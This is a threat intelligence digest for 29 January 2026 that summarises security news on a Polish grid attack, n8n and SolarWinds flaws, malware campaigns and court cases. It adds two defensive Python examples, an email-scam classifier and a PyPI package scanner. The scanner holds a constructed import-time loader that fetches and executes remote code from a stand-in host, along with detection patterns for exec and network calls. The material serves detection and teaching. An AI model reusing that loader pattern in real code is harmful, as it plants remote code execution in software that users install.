Cyber Threat Intelligence 29 January 2026
Energy Sector
- Cyberattack On Polish Energy Grid Impacted Around 30 Facilities
"The coordinated attack on Poland's power grid in late December targeted multiple distributed energy resource (DER) sites across the country, including combined heat and power (CHP) facilities and wind and solar dispatch systems. Although the attacker compromised operational technology (OT) systems damaging "key equipment beyond repair," they failed to disrupt power, totalling 1.2 GW or 5% of Poland’s energy supply. Based on public reports, there are at least 12 confirmed affected sites. However, researchers at Dragos, a critical industrial infrastructure (OT) and control systems (ICS) security company say that the number is approximately 30."
https://www.bleepingcomputer.com/news/security/cyberattack-on-polish-energy-grid-impacted-around-30-facilities/
https://hub.dragos.com/report/electrum-targeting-polands-electric-sector
https://5943619.hs-sites.com/hubfs/Reports/dragos-2025-poland-attack-report.pdf
https://thehackernews.com/2026/01/russian-electrum-tied-to-december-2025.html
https://therecord.media/poland-electrical-grid-cyberattack-30-facilities-affected
Vulnerabilities
- Achieving Remote Code Execution On n8n Via Sandbox Escape - CVE-2026-1470 & CVE-2026-0863
"The JFrog Security Research team recently discovered and disclosed two vulnerabilities in n8n’s sandbox mechanism: CVE-2026-1470, rated 9.9 Critical, impacting the expression evaluation engine, and CVE-2026-0863, rated 8.5 High, affecting Python execution in the Code node (“Internal” mode). n8n is a popular AI workflow automation platform that combines AI capabilities with business process automation."
https://research.jfrog.com/post/achieving-remote-code-execution-on-n8n-via-sandbox-escape/
https://thehackernews.com/2026/01/two-high-severity-n8n-flaws-allow.html
https://www.bleepingcomputer.com/news/security/new-sandbox-escape-flaw-exposes-n8n-instances-to-rce-attacks/
https://www.infosecurity-magazine.com/news/n8n-sandbox-flaws-allow-rce/
- SolarWinds Warns Of Critical Web Help Desk RCE, Auth Bypass Flaws
"SolarWinds has released security updates to patch critical authentication bypass and remote command execution vulnerabilities in its Web Help Desk IT help desk software. The authentication bypass security flaws (tracked as CVE-2025-40552 and CVE-2025-40554) patched today by SolarWinds were reported by watchTowr's Piotr Bazydlo and can be exploited by remote unauthenticated threat actors in low-complexity attacks. Bazydlo also found and reported a critical remote code execution (RCE) flaw (CVE-2025-40553) stemming from an untrusted data deserialization weakness that can enable attackers without privileges to run commands on vulnerable hosts."
https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- New Architecture, New Risks: One-Click To Pwn IDIS IP Cameras
"Modern capabilities, such as cloud-powered management, analytics, and detection, have introduced a new architectural era to IP-based video surveillance, which remains a prominent safety feature across enterprises, manufacturing facilities, military installations, and even apartments and small businesses. What was once a world of on-premises network video recorders (NVRs), local storage arrays, and LAN-based management systems is now a connected environment largely operating in the cloud."
https://claroty.com/team82/research/new-architecture-new-risks-one-click-to-pwn-idis-ip-cameras
https://www.bankinfosecurity.com/idis-surveillance-management-software-vulnerable-to-hacking-a-30616
- CISA Adds One Known Exploited Vulnerability To Catalog
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2026-24858 Fortinet Multiple Products Authentication Bypass Using an Alternate Path or Channel Vulnerability"
https://www.cisa.gov/news-events/alerts/2026/01/27/cisa-adds-one-known-exploited-vulnerability-catalog
https://securityaffairs.com/187435/security/u-s-cisa-adds-a-flaw-in-multiple-fortinet-products-to-its-known-exploited-vulnerabilities-catalog-2.html
- Bypassing Windows Administrator Protection
"A headline feature introduced in the latest release of Windows 11, 25H2, is Administrator Protection. The goal of this feature is to replace User Account Control (UAC) with a more robust and, importantly, securable system to allow a local user to access administrator privileges only when necessary. This blog post will give a brief overview of the new feature, how it works and how it’s different from UAC. I’ll then describe some of the security research I undertook while it was in the insider preview builds on Windows 11."
https://projectzero.google/2026/26/windows-administrator-protection.html
https://www.theregister.com/2026/01/28/google_windows_admin_exploit/
Malware
- Viral Moltbot AI Assistant Raises Concerns Over Data Security
"Security researchers are warning of insecure deployments in enterprise environments of the Moltbot (formerly Clawdbot) AI assistant, which can lead to leaking API keys, OAuth tokens, conversation history, and credentials. Moltbot is an open-source personal AI assistant with deep system integration created by Peter Steinberger that can be hosted locally on user devices and integrated directly with the user’s apps, including messengers and email clients, as well as the filesystem. Unlike cloud-based chatbots, Moltbot can run 24/7 locally, maintaining a persistent memory, proactively reaching out to the user for alerts/reminders, executing scheduled tasks, and more."
https://www.bleepingcomputer.com/news/security/viral-moltbot-ai-assistant-raises-concerns-over-data-security/
https://thehackernews.com/2026/01/fake-moltbot-ai-coding-assistant-on-vs.html
- Operation Bizarre Bazaar: First Attributed LLMjacking Campaign With Commercial Marketplace Monetization
"Between December 2025 and January 2026, Pillar Security Research team uncovered a disturbing evolution in AI-focused cyber threats. Our honeypots captured 35,000 attack sessions targeting exposed AI infrastructure. We have named this campaign Operation Bizarre Bazaar. It represents the first public documentation of a systematic campaign targeting exposed LLM and Model Context Protocol (MCP) endpoints at scale, featuring complete commercial monetization. The investigation reveals how cybercriminals discover, validate, and monetize unauthorized access to AI infrastructure through a coordinated supply chain spanning reconnaissance, validation, and commercial resale."
https://www.pillar.security/blog/operation-bizarre-bazaar-first-attributed-llmjacking-campaign-with-commercial-marketplace-monetization
https://www.pillar.security/resources/operation-bizarre-bazaar
https://www.bleepingcomputer.com/news/security/hackers-hijack-exposed-llm-endpoints-in-bizarre-bazaar-operation/
- Can’t Stop, Won’t Stop: TA584 Innovates Initial Access
"Proofpoint tracks multiple sophisticated cybercriminal threat actors, and one of the most frequently active with high volume campaigns is TA584. TA584 is a prominent initial access broker (IAB) that targets organizations globally. In the second half of 2025, TA584 demonstrated multiple attack chain changes including adopting ClickFix social engineering, expanded targeting to more consistently target specific geographies and languages, and recently delivering a new malware called Tsundere Bot. TA584 overlaps with a group tracked as Storm-0900."
https://www.proofpoint.com/us/blog/threat-insight/cant-stop-wont-stop-ta584-innovates-initial-access
https://www.bleepingcomputer.com/news/security/initial-access-hackers-switch-to-tsundere-bot-for-ransomware-attacks/
- Trusted, Signed, Still Malicious. Exploiting Custom Email Text To Bypass Security Controls
"A recent series of phone scam emails has been able to bypass traditional email security measures by placing malicious messages within document names, online meeting descriptions, or account name fields. These emails redirect otherwise legitimate business emails to potential victims, and are particularly notable for embedding phone scams and other malicious content while still retaining the legitimate business’s From address. This makes the email appear to originate from a trusted sender, even though it actually contains a malicious message written by the threat actor. While spoofing the From address would typically trigger failures from Sender Policy Framework (SPF) headers and editing an email would typically trigger failures from DomainKeys Identified Mail (DKIM) headers, these sample emails pass both these security checks because the email was technically sent from a legitimate and trusted source."
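The mechanism Cofense describes is that the sender genuinely is the trusted platform, so SPF, DKIM and DMARC all pass; the attacker's text simply rides along in a field (document name, meeting description, account name) that the platform echoes into its own notification. A detection therefore has to treat authentication as a property of the transport and inspect the echoed content separately. The following Python is an added example, not Cofense's code or anything from the post: it parses a constructed notification email, reads the receiving MX's Authentication-Results header, and flags callback-scam content (a phone number paired with pressure wording) in the subject and body even though every authentication check passes. The domains, names, addresses and phone number are made up.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Constructed sample (hypothetical domains, names and phone number): a
# document-sharing platform sends its normal notification, but the attacker
# typed the scam into the "document name" field, so the platform's own mail
# servers signed and sent it and the receiving MX recorded spf/dkim/dmarc=pass.
SCAM_NOTIFICATION = """\
From: "DocShare Notifications" <no-reply@docshare.example>
To: victim@corp.example
Subject: A document has been shared with you
Authentication-Results: mx.corp.example;
 spf=pass smtp.mailfrom=docshare.example;
 dkim=pass header.d=docshare.example;
 dmarc=pass header.from=docshare.example
Content-Type: text/plain; charset=utf-8

Jane Doe shared a document with you:
"INVOICE 88213 - Your account was charged $499.00. To cancel, call +1 (800) 555-0142 within 24 hours."

Open it: https://docshare.example/d/abc123
"""

# Same platform, same passing headers, a benign document name.
BENIGN_NOTIFICATION = SCAM_NOTIFICATION.replace(
    '"INVOICE 88213 - Your account was charged $499.00. To cancel, call +1 (800) 555-0142 within 24 hours."',
    '"Q1 planning notes"',
)

PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}\b")
PRESSURE_RE = re.compile(
    r"\b(charged|refund|cancel|suspended|within 24 hours|call (?:us|now|immediately))\b", re.I
)


def auth_results(msg: EmailMessage) -> dict[str, str]:
    """Collect {method: verdict} from the receiving MX's Authentication-Results header(s)."""
    results: dict[str, str] = {}
    for hdr in msg.get_all("Authentication-Results", []):
        for method, verdict in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", str(hdr), re.I):
            results[method.lower()] = verdict.lower()
    return results


def echoed_text(msg: EmailMessage) -> str:
    """Subject plus text/plain body: where a platform echoes user-supplied field values."""
    body = msg.get_body(preferencelist=("plain",))
    return str(msg.get("Subject", "") or "") + "\n" + (body.get_content() if body else "")


def classify(raw: str) -> dict:
    """Judge authentication and content separately; only the content decides the verdict."""
    msg = email.message_from_string(raw, policy=policy.default)
    auth = auth_results(msg)
    text = echoed_text(msg)
    phones = PHONE_RE.findall(text)
    pressure = [t.lower() for t in PRESSURE_RE.findall(text)]
    return {
        "authenticated": auth.get("spf") == "pass" and auth.get("dkim") == "pass",
        "auth": auth,
        "phone_numbers": phones,
        "pressure_terms": pressure,
        # a phone number alone is normal in notifications; require pressure wording too
        "verdict": "callback-scam-suspect" if phones and pressure else "clean",
    }


if __name__ == "__main__":
    for name, raw in (("scam", SCAM_NOTIFICATION), ("benign", BENIGN_NOTIFICATION)):
        print(name, classify(raw))
```

The verdict deliberately requires both a phone number and a pressure term, because many legitimate notifications carry a phone number; tune the patterns to your own telemetry. The practical point is that a DMARC pass on platform-originated mail must not short-circuit content inspection.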
https://cofense.com/blog/trusted,-signed,-still-malicious-exploiting-custom-email-text-to-bypass-security-controls
- Phishing At Cloud Scale: How AWS Is Abused For Credential Theft
"Threat actors are abusing web services from Amazon like Simple Storage Service (S3) buckets, Amazon Simple Email Service (SES), and Amazon Web Service (AWS) Amplify to launch credential phishing attacks due to their trusted infrastructure, scalability, and ease of abuse. AWS offers threat actors a cloak of legitimacy, bypassing many traditional email based security controls like Secure Email Gateways (SEGs) and other email security technologies, amplifying the risk in today’s connected digital landscape. This report outlines how AWS is abused, supported by examples and phishing trends from June 2021 to December 2025."
https://cofense.com/blog/phishing-at-cloud-scale-how-aws-is-abused-for-credential-theft
- Unveiling The Weaponized Web Shell EncystPHP
"FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment. Incidents were launched in early December last year and propagated via exploitation of the FreePBX vulnerability CVE-2025-64328. Its malicious activity appears to be associated with the hacker group INJ3CTOR3, first identified in 2020, which targeted CVE-2019-19006. In 2022, the threat actor shifted its focus to the Elastix system via CVE-2021-45461. These incidents begin with the exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web shell in the target environments. We assess that this campaign represents recent attack activity and behavior patterns associated with INJ3CTOR3."
https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
- Android.Phantom Trojans Are Bundled With Modded Games And Popular Apps To Infiltrate Smartphones. They Use Machine Learning And Video Broadcasts To Engage In Click Fraud
"Experts at the Doctor Web antivirus laboratory have discovered and investigated a new trojan clicker malware family. All of these trojans either are administered via the hxxps[:]//dllpgd[.]click server or get downloaded and launched after the corresponding instruction is received from the remote host. Malware belonging to this family infects Android smartphones. Xiaomi’s GetApps software catalogue is one of its principal distribution channels."
https://news.drweb.com/show/?i=15110&lng=en
https://hackread.com/phantom-malware-android-game-mods-ad-fraud/
- PureRAT: Attacker Now Using AI To Build Toolset
"A Vietnamese threat actor is likely using AI to author code powering an ongoing phishing campaign delivering the PureRAT malware and other payloads. The phishing emails masquerade as job opportunities and the attacker may be using them as a lure in the hope that recipients open the emails using work computers. The attacker’s usage of AI provides further evidence that the technology is being used by lower-skilled attackers to assist with developing tools and automating their attacks."
https://www.security.com/threat-intelligence/ai-purerat-phishing
https://www.infosecurity-magazine.com/news/emojis-in-purerats-code/
- Malicious PyPI Packages Spellcheckpy And Spellcheckerpy Deliver Python RAT
"On January 20th and 21st, 2026, our malware detection pipeline flagged two new PyPI packages: spellcheckerpy and spellcheckpy. Both claimed to be by the legitimate author of the pyspellchecker library. Both linked to his real GitHub repo. They weren't his. Hidden inside the Basque language dictionary file was a base64-encoded payload that downloads a full-featured Python RAT. The attacker published three "dormant" versions first, payload present, trigger absent, then flipped the switch with spellcheckpy v1.2.0, adding an obfuscated execution trigger that fires the moment you import SpellChecker."
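Two things in Aikido's write-up are worth turning into a check: the payload lives in a data file rather than in Python source, so a scanner that only looks at .py files misses it, and the "dormant" releases are distinguishable from the "armed" one purely by whether a module-level statement decodes and executes it at import time. The following Python is an added example, not Aikido's pipeline or the malicious packages' code: it scans a constructed stand-in for the two package versions (hypothetical file paths, a made-up word list, and a harmless stage-2 stub that only names a non-routable .invalid host and is never executed), decoding long base64 runs in every file and looking for exec()/eval() outside any function body in the .py files.

```python
import ast
import base64
import re

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
CODE_MARKERS = ("exec(", "eval(", "urlopen", "subprocess", "__import__", "socket", "compile(")

# Constructed stand-in for the package's files (hypothetical paths and content).
# The stage-2 stub references a non-routable .invalid host and is never run here.
STAGE2_STUB = (
    "import urllib.request\n"
    'exec(urllib.request.urlopen("http://stage2.invalid/rat.py").read())\n'
)
ENCODED_STAGE2 = base64.b64encode(STAGE2_STUB.encode()).decode()

# A word-list data file: a few plausible entries with the payload hidden among them.
DICT_FILE = "\n".join(["etxe", "kale", "ibai", "mendi", ENCODED_STAGE2, "ur", "zubi"])

# "Dormant" release: payload shipped in the data file, nothing touches it.
DORMANT_INIT = '''\
from .spellchecker import SpellChecker
__all__ = ["SpellChecker"]
'''

# "Armed" release: a module-level statement decodes the longest line of the
# word list and exec()s it, so it fires the moment the package is imported.
ARMED_INIT = '''\
from .spellchecker import SpellChecker
import base64 as _b, pkgutil as _p
_words = _p.get_data(__name__, "resources/eu.txt").decode().splitlines()
exec(_b.b64decode(max(_words, key=len)))
__all__ = ["SpellChecker"]
'''

DORMANT_VERSION = {"spellcheckpy/resources/eu.txt": DICT_FILE, "spellcheckpy/__init__.py": DORMANT_INIT}
ARMED_VERSION = {"spellcheckpy/resources/eu.txt": DICT_FILE, "spellcheckpy/__init__.py": ARMED_INIT}


def encoded_code_blobs(text: str) -> list[dict]:
    """Decode every long base64 run in a file and keep those that decode to code-like text."""
    hits = []
    for m in B64_RUN.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or binary data rather than source text
        markers = [t for t in CODE_MARKERS if t in decoded]
        if markers:
            hits.append({"offset": m.start(), "markers": markers, "preview": decoded[:60]})
    return hits


def import_time_exec(source: str) -> list[str]:
    """Module-level exec()/eval() calls: code that runs on `import`, not when an API is called."""
    findings = []
    for stmt in ast.parse(source).body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue  # bodies run only when called; not an import-time trigger
        for node in ast.walk(stmt):
            if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                    and node.func.id in ("exec", "eval")):
                findings.append(f"line {node.lineno}: {node.func.id}() at import time")
    return findings


def scan_package(files: dict[str, str]) -> dict:
    """Cross-check data files for hidden code against .py files for an import-time trigger."""
    report: dict = {"encoded_payloads": {}, "import_time_exec": {}}
    for path, content in files.items():
        blobs = encoded_code_blobs(content)  # every file, not only .py
        if blobs:
            report["encoded_payloads"][path] = blobs
        if path.endswith(".py"):
            triggers = import_time_exec(content)
            if triggers:
                report["import_time_exec"][path] = triggers
    has_payload, has_trigger = bool(report["encoded_payloads"]), bool(report["import_time_exec"])
    report["verdict"] = {(True, True): "armed", (True, False): "dormant",
                         (False, True): "trigger-without-payload", (False, False): "clean"}[(has_payload, has_trigger)]
    return report


if __name__ == "__main__":
    for label, files in (("dormant build", DORMANT_VERSION), ("armed build", ARMED_VERSION)):
        print(label, scan_package(files)["verdict"])
```

The "dormant" verdict is the useful one for a registry or CI gate: a package carrying decodable code inside a dictionary file has no legitimate reason to do so, and waiting for the trigger to appear in a later release means the payload is already in your dependency cache.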
https://www.aikido.dev/blog/malicious-pypi-packages-spellcheckpy-and-spellcheckerpy-deliver-python-rat
https://thehackernews.com/2026/01/fake-python-spellchecker-packages-on.html
- Love? Actually: Fake Dating App Used As Lure In Targeted Spyware Campaign In Pakistan
"ESET researchers have uncovered an Android spyware campaign leveraging romance scam tactics to target individuals in Pakistan. The campaign uses a malicious app posing as a chat platform that allows users to initiate conversations with specific “girls” – fake profiles probably operated via WhatsApp. Underneath the romance charade, the real purpose of the malicious app, which we named GhostChat, is exfiltration of the victim’s data – both upon first execution and continually while the app is installed on the device. The campaign employs a layer of deception that we have not previously seen in similar schemes – the fake female profiles in GhostChat are presented to potential victims as locked, with passcodes required to access them."
https://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/
https://www.helpnetsecurity.com/2026/01/29/ghostchat-android-romance-spyware/
General News
- Audits For AI Systems That Keep Changing
"Security and risk teams often rely on documentation and audit artifacts that reflect how an AI system worked months ago. ETSI’s continuous auditing based conformity assessment specification (ETSI TS 104 008) describes a different approach, where conformity is evaluated through recurring measurement and automated evidence collection tied to live system behavior."
https://www.helpnetsecurity.com/2026/01/28/etsi-ts-104-008-ai-continuous-auditing/
https://www.etsi.org/deliver/etsi_ts/104000_104099/104008/01.01.01_60/ts_104008v010101p.pdf
- FBI Seizes RAMP Cybercrime Forum Used By Ransomware Gangs
"The FBI has seized the notorious RAMP cybercrime forum, a platform used to advertise a wide range of malware and hacking services, and one of the few remaining forums that openly allowed the promotion of ransomware operations. Both the forum's Tor site and its clearnet domain, ramp4u[.]io, now display a seizure notice stating, "The Federal Bureau of Investigation has seized RAMP.""
https://www.bleepingcomputer.com/news/security/fbi-seizes-ramp-cybercrime-forum-used-by-ransomware-gangs/
https://hackread.com/russian-cybercrime-ramp-forum-seized-fbi/
https://www.theregister.com/2026/01/28/fbi_seizes_ramp_forum/
- Empire Cybercrime Market Owner Pleads Guilty To Drug Conspiracy
"A Virginia man who co-created Empire Market, one of the largest dark web marketplaces at the time, pleaded guilty to federal drug conspiracy charges for facilitating $430 million in illegal transactions from 2018 to 2020. The marketplace operated as a hidden service accessible only via TOR browsers and was advertised as an AlphaBay "clone," modeled after the notorious dark web marketplace shut down by authorities in 2017."
https://www.bleepingcomputer.com/news/security/empire-cybercrime-market-owner-pleads-guilty-to-drug-conspiracy/
- Slovakian Man Pleads Guilty To Operating Darknet Marketplace
"A Slovakian national admitted on Tuesday to helping operate a darknet marketplace that sold narcotics, cybercrime tools and services, fake government IDs, and stolen personal information for more than two years. 33-year-old Alan Bill (also known online as "Vend0r" or "KingdomOfficial") pleaded guilty to conspiracy to distribute controlled substances for his role in running Kingdom Market, which operated from March 2021 through December 2023."
https://www.bleepingcomputer.com/news/security/slovakian-man-pleads-guilty-to-operating-kingdown-market-cybercrime-marketplace/
- The Trends Defining Cyber Security In 2026: Cyber Security Report 2026
"Security programs are being asked to defend increasingly complex environments against cyber attacks that are faster, more automated, and harder to isolate. The past year of attacks reveals a measurable shift in how adversaries operate, coordinate, and scale across enterprise environments. The Cyber Security Report 2026 is based on direct analysis of global attack activity spanning AI driven attacks, ransomware operations, hybrid environments, and multi channel social engineering. It documents how these techniques are being executed in practice, at scale, across industries and regions."
https://blog.checkpoint.com/research/the-trends-defining-cyber-security-in-2026-cyber-security-report-2026/
- Consumers Reluctant To Shop At Stores That Don't Take Security Seriously
"While it's nearly impossible for retail organizations to avoid incidents these days, implementing effective security protocols should be a top priority, as consumers become more security-savvy. Threat actors target the retail sector because shops hold highly coveted information, like financial and purchasing history, that can be further abused in fraud scams. And unlike more regulated sectors such as energy or financial services, that information may not be as tightly protected, especially among small mom-and-pops with fewer resources."
https://www.darkreading.com/cyber-risk/consumers-reluctant-to-shop-at-stores-hit-by-cyberattacks
- Surging Cyberattacks Boost Latin America To Riskiest Region
"Latin America and the Caribbean can now lay claim to an unenviable status: cyberattackers' favorite region to target with cyberattacks. Organizations in Latin America saw an average of 3,065 attacks per week last year, a year-over-year surge of 26%, leapfrogging Africa as the top geographic region for cyber-risk, according to the latest data from Check Point Research. About three-quarters (76%) of organizations suffered information disclosure attacks, while a majority also encountered attempts at remote code execution and authentication bypass. In all, Latin American organizations see about 40% more attacks than the global average."
https://www.darkreading.com/cyber-risk/surging-cyberattacks-latin-america-riskiest-region
- Grammarly And QuillBot Are Among Widely Used Chrome Extensions Facing Serious Privacy Questions
"A new study shows that some of the most widely used AI-powered browser extensions are a privacy risk. They collect lots of data and require a high level of browser access. The research was conducted by Incogni, which analyzed 442 AI-powered Google Chrome extensions for its 2026 privacy risk report. The study reviewed extensions across eight categories and assessed their permissions, declared data collection practices, and security risk scores."
https://www.helpnetsecurity.com/2026/01/28/incogni-chrome-extensions-privacy-risks-report/
- Zscaler 2026 AI Threat Report: 91% Year-Over-Year Surge In AI Activity Creates Growing Oversight Gap For Global Enterprises
"Zscaler, Inc. (NASDAQ: ZS), the leader in cloud security, today released the findings of the ThreatLabz 2026 AI Security Report, warning that enterprises are unprepared for the next wave of AI‑driven cyber risk, even as AI becomes embedded in business operations. Based on an analysis of nearly one trillion AI/ML transactions across the Zscaler Zero Trust Exchange platform between January and December of 2025, the research shows that enterprises are reaching a tipping point where AI has transitioned from a productivity tool to a primary vector for autonomous, machine-speed conflict."
https://www.zscaler.com/press/zscaler-2026-ai-threat-report-91-year-over-year-surge-ai-activity-creates-growing-oversight
https://www.infosecurity-magazine.com/news/ai-security-threats-loom-zscaler/
- Researchers Uncover 454,000+ Malicious Open Source Packages
"Security researchers have warned that the open source ecosystem has become a “structural risk,” after revealing another surge in malicious packages last year. Sonatype said in its 2026 State of the Software Supply Chain report that developers downloaded components 9.8 trillion times last year across Maven Central, PyPI, npm and NuGet. The challenge is that many of these contained malware or vulnerabilities. The security vendor said it discovered 454,648 new malicious packages last year, warning that threats had evolved from “spam and stunts” into “sustained, industrialized campaigns” – many of which are state sponsored."
https://www.infosecurity-magazine.com/news/454000-malicious-open-source/
- Chinese Language Money Laundering Networks Emerge As Major Facilitators Of The Illicit Crypto Economy, Now Driving 20% Of Laundering Activity
"After emerging at the start of the pandemic, Chinese-language money laundering networks (CMLNs) now dominate known crypto money laundering activity, processing an estimated 20% of illicit crypto funds over the past five years. This growth is 7,325 times faster than growth of illicit inflows to centralized exchanges since 2020. CMLNs processed $16.1 billion in 2025 — approximately $44 million per day across 1,799+ active wallets. Chainalysis has identified on-chain behavioral fingerprints of six distinct service types within the CMLN ecosystem. Black U and gambling services fragment large transactions into small amounts to evade detection, while over-the-counter (OTC) services consolidate small transactions into large amounts for integration."
https://www.chainalysis.com/blog/2026-crypto-money-laundering/
https://www.infosecurity-magazine.com/news/chinese-money-launderers-global/
- 2026 Public Sector Cyber Outlook: Identity, AI And The Fight For Trust
"The early weeks of 2026 have already made one thing clear: Government cybersecurity is in a new phase, shaped not by incremental change, but by the rapid integration of AI into core public-sector missions. AI systems are now embedded in critical infrastructure, federal service delivery, research environments, as well as state and local operations. At the same time, nation-state adversaries are leveraging AI to accelerate intrusion, scale deception and manipulate trusted systems in ways not possible even a year ago."
https://www.paloaltonetworks.com/blog/2026/01/public-sector-cyber-outlook/
- 7 Predictions For The 2026 Threat Landscape: Navigating The Year Ahead
"As we navigate 2026, the pace of technological change continues to accelerate — and with it, the cyber threat landscape. Over the past year, our ThreatLabz research team has analyzed countless threats, uncovering trends that give us a clear view of the challenges and opportunities that lie ahead. The rise of artificial intelligence, the dissolution of the traditional perimeter into a hyper-distributed attack surface of users, devices, and applications, and the industrialization of cybercrime demand a new level of vigilance and a modern, AI-powered defensive strategy."
https://www.zscaler.com/blogs/security-research/7-predictions-2026-threat-landscape-navigating-year-ahead
- Cyber Insights 2026: Offensive Security; Where It Is And Where It’s Going
"Cyber red teaming will change more in the next 24 months than it has in the past ten years. Malicious attacks are increasing in frequency, sophistication and damage. Defenders need to find and harden system weaknesses before attackers can attack them. That requires red teams to do more, faster."
https://www.securityweek.com/cyber-insights-2026-offensive-security-where-it-is-and-where-its-going/
- Why We Can’t Let AI Take The Wheel Of Cyber Defense
"If you want to waste the incredible potential of artificial intelligence, there is a quick way to do it: confuse automation with actual safety or mistake a shiny new tech feature for true resilience. We are currently living through a strange and intense moment in the security world. AI development is moving at a speed that most companies honestly can’t handle, yet the market is flooded with sales pitches promising “autonomous” cyber defenses. The narrative is always the same: install this system, and it will clean up your security mess while you go grab a coffee."
https://www.securityweek.com/why-we-cant-let-ai-take-the-wheel-of-cyber-defense/
- From Concept To Practice: How SSVC Has Evolved To Make Adoption Possible
"It’s Patch Tuesday. Your software scanners light up with almost 70 percent more vulnerabilities than last month, and by Friday you’re expected to explain, clearly and defensibly, which ones matter, which ones wait, and which ones could put the organization at real risk if ignored. Your teams are already stretched, new AI-enabled software is landing faster than it can be inventoried, and every dashboard insists its prioritization should come first."
https://www.sei.cmu.edu/blog/from-concept-to-practice-how-ssvc-has-evolved-to-make-adoption-possible/
Reference
Electronic Transactions Development Agency (ETDA)